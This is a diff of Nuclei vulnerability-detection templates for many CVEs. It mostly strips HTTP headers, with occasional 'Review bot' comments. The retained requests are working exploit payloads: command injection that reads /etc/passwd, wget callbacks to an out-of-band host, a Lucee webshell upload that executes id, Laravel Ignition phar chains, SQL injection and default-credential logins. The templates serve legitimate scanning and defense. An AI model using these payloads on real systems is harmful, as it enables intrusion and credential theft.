GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/neo HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/stc HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
@ -59,9 +46,6 @@ requests:
- |
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
@ -70,20 +54,14 @@ requests:
<clipermission></clipermission>
cookie-reuse: true
# Using cookie-reuse to maintain session between each request, same as browser.
extractors:
- type: regex
name: randkey
name: randkey # dynamic variable
part: body
internal: true
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
# Using rand_key as dynamic variable to make use of extractors at run time.
matchers:
- type: regex
regex:


@ -5,23 +5,15 @@ info:
author: dwisiswant0
severity: high
tags: cve,cve2020,citrix
description: |
Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
reference:
- https://support.citrix.com/article/CTX276688
description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
reference: https://support.citrix.com/article/CTX276688
requests:
- raw:
- |
GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
@ -29,10 +21,12 @@ requests:
words:
- "<jnlp codebase=\"nonexistent.1337\">"
part: body
- type: word
words:
- "application/x-java-jnlp-file"
part: header
- type: status
status:
- 200


@ -15,9 +15,6 @@ requests:
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a


@ -14,10 +14,6 @@ requests:
- |
GET /graph_realtime.php?action=init HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
matchers:


@ -12,8 +12,6 @@ requests:
path:
- "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
- "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:


@ -21,9 +21,7 @@ requests:
- |
POST /storfs-asup HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Content-Length: 78
Content-Type: application/x-www-form-urlencoded
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`


@ -24,11 +24,7 @@ requests:
Host: {{Hostname}}
Cookie: lang=8; url=ping.html; mobile=false;
Referer: {{BaseURL}}/info.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
matchers-condition: and
matchers:


@ -16,24 +16,13 @@ requests:
- |
POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
imgSrc=a
- |
POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 790
imgSrc=
<cfoutput>
@ -62,13 +51,11 @@ requests:
</pre>
</cfif>
</cfoutput>
- |
POST /lucee/{{randstr}}.cfm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
cmd=id&opts=&timeout=5
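Review bot: The second request writes `{{randstr}}.cfm` into the Lucee `context` directory and the third executes it with `cmd=id`, but no request removes the file afterwards, so every positive match leaves an executable script on the target. Either a final request that deletes or overwrites `/lucee/{{randstr}}.cfm` should follow, or the info block (outside this hunk) should say that the check leaves an artifact for the operator to clean up; until then a comment like `- | # leaves context/{{randstr}}.cfm on the target — no cleanup request` on the second raw block would document it. The F5 section earlier in this commit has the same shape: it deletes its `cli alias` but leaves `/tmp/nonexistent` in place.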


@ -18,7 +18,6 @@ requests:
- |
POST /wp-json/buddypress/v1/signup HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: application/json; charset=UTF-8
{


@ -14,7 +14,6 @@ requests:
POST /casa/nodes/thumbprints HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
["127.0.0.1:443/ui/"]


@ -19,8 +19,6 @@ requests:
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
Content-Length: 86
Connection: close
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}


@ -16,10 +16,8 @@ requests:
- |
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}


@ -17,7 +17,6 @@ requests:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 47
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -


@ -13,13 +13,7 @@ requests:
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 173
Connection: close
{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}


@ -15,10 +15,7 @@ requests:
- |
POST /druid/indexer/v1/sampler HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 1006
Connection: close
{
"type":"index",


@ -19,42 +19,38 @@ requests:
- |
POST /webtools/control/SOAPService HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 910
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>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</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://t53lq9.dnslog.cn/"></std-String>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>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</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://t53lq9.dnslog.cn/"></std-String>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "OFBiz.Visitor="
part: header
- type: word
words:
- "deserializing"


@ -16,18 +16,11 @@ requests:
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
extractors:
- type: regex


@ -4,8 +4,7 @@ info:
name: Hongdian Sensitive Information
author: gy741
severity: medium
description: |
Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28150
@ -16,26 +15,12 @@ requests:
- |
GET /backup2.cgi HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
- |
GET /backup2.cgi HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:
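Review bot: The two `/backup2.cgi` requests differ only in their `Authorization: Basic` values, and the base64 hides which account each one tries, so the second block reads like a copy-paste leftover rather than a deliberate second attempt. A comment on each raw block naming the account under test, in the `- | # Get /etc/passwd` style other templates in this commit already use (for example `- | # default guest account` and `- | # default admin account`), would document why both are sent. The matchers that decide the result are below this hunk, so whether one or both responses must match is not visible here.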


@ -16,36 +16,18 @@ requests:
- |
POST /tools.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 85
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Upgrade-Insecure-Requests: 1
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://{{Hostname}}/tools.cgi
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid
- |
POST /tools.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 85
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://{{Hostname}}/tools.cgi
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid


@ -14,21 +14,15 @@ requests:
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Accept: */*
Content-Length: 23
Content-Type: application/json
Connection: close
{"Password":"{{randstr}}"}
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Content-Length: 50
Content-Type: application/json
Connection: close
{"UserName":"Administrator","Password":"{{randstr}}"}


@ -14,11 +14,7 @@ requests:
POST /index.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
SPOOLDIR=test".system(id)."&recheck=Recheck


@ -15,10 +15,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@ -26,10 +23,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@ -37,10 +31,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
@ -48,10 +39,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41
=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
@ -59,10 +47,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@ -70,10 +55,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}


@ -15,12 +15,8 @@ requests:
- |
POST /goform/setmac HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/index.htmlr
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Origin: {{BaseURL}}
Referer: {{BaseURL}}/index.htmlr
Content-Type: application/x-www-form-urlencoded
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
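Review bot: The POST body on the last line of this hunk is not a read-only probe: it rewrites the router's wireless configuration (wifiSSID=Tenda_B0E040, wifiPwd=Password12345, wifiEn_5G=true, wpsEn=true, wanType=static) as the carrier for the interactsh callback, and nothing in the request block says so. A comment above the request, `# Intrusive: this request overwrites the device's WiFi SSID/password and WAN settings`, would let operators exclude it where that side effect is unacceptable. Separately, the new `Referer: {{BaseURL}}/index.htmlr` line carries what looks like a typo for `index.html`, though the endpoint probably ignores the Referer value; the template's info block, where an intrusive tag would live, is outside this hunk.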


@ -14,7 +14,6 @@ requests:
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: {{Hostname}}
User-Agent: asusrouter--
Connection: close
Referer: {{BaseURL}}
Cookie: asus_token=\0Invalid; clickedItem_tab=0
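Review bot: The surviving Cookie line `asus_token=\0Invalid` is inside a YAML literal block, so `\0` reaches the wire as the two characters backslash and zero, not a NUL byte; whether that is the intended bypass value or a lost escape is not clear from the hunk. A one-line comment above the request stating which is meant, e.g. `# literal "\0" (two bytes) is intentional — the server mishandles the token prefix`, would stop the next cleanup pass from "fixing" it. The start of this request block is outside the hunk.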


@ -14,10 +14,6 @@ requests:
- |
GET /status.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: language=en; login=1
matchers-condition: and


@ -15,9 +15,6 @@ requests:
GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Connection: keep-alive
matchers:
- type: word
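Review bot: The remaining `Accept:` line is a verbatim browser-default list (text/html, avif, webp, signed-exchange with q-values), which is exactly the kind of non-functional header this cleanup strips elsewhere; keeping it while dropping User-Agent and Cache-Control is inconsistent. Unless the CGI branches on the Accept value, `Accept: */*` or no Accept header at all would match the rest of the commit. The request block begins outside this hunk.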


@ -16,13 +16,11 @@ requests:
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- |+
GET /.%00/WEB-INF/web.xml HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
unsafe: true


@ -12,13 +12,10 @@ requests:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Connection: close
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_username"
@ -77,13 +74,10 @@ requests:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Connection: close
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In


@ -10,16 +10,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
requests:
- method: GET
path:
- '{{BaseURL}}/api/get_device_details'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: '{{BaseURL}}/assets/base/home.html'
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
# admin:password
matchers-condition: and
matchers:
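Review bot: The Authorization header on the new side is a fully precomputed Digest response with a fixed nonce, cnonce and nc=00000001, which can only succeed if Bridge-IT accepts a client-chosen nonce instead of validating the one it issued; against a server that checks nonce freshness the request always fails and the matchers never observe the default-credential case. The `# admin:password` comment that now sits next to it should state that assumption so the template is not mistaken for a live credential check, e.g. `# Precomputed Digest for admin:password; only valid if the device accepts a fixed/replayed nonce`. If the device does validate nonces, the template would need a challenge-then-response flow rather than a static header; the matcher definitions that decide this are outside the hunk.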


@ -14,36 +14,24 @@ requests:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"admin","password":"cs141-snmp"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"engineer","password":"engineer"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"guest","password":"guest"}


@ -11,15 +11,9 @@ requests:
- |
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: {{BaseURL}}
Referer: {{BaseURL}}/libs/granite/core/content/login.html
Connection: close
